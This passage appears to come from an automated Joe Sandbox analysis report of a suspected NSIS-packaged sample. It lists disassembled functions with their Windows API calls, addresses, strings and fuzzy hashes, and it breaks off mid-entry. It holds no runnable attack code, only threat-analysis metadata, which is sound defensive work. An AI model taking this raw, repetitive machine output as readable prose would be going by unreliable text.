                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                              • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                              • Opcode Fuzzy Hash: e143629cae8b78290b003201c05bc4b587d1aa12e059c50f50ac21e9d0b7acf9
                                                                                                              • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$Enum
                                                                                                              • String ID:
                                                                                                              • API String ID: 464197530-0
                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405D76
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405E1E
                                                                                                              • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00405E2E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                              • String ID: 0_B
                                                                                                              • API String ID: 3248276644-2128305573
                                                                                                              • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                              • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                              • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                              • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                              • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75573420,004036EF), ref: 00405F46
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: nsa
                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                              Strings
                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                              • String ID: Error launching installer
                                                                                                              • API String ID: 3712363035-66219284
                                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                              • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                              Memory Dump Source
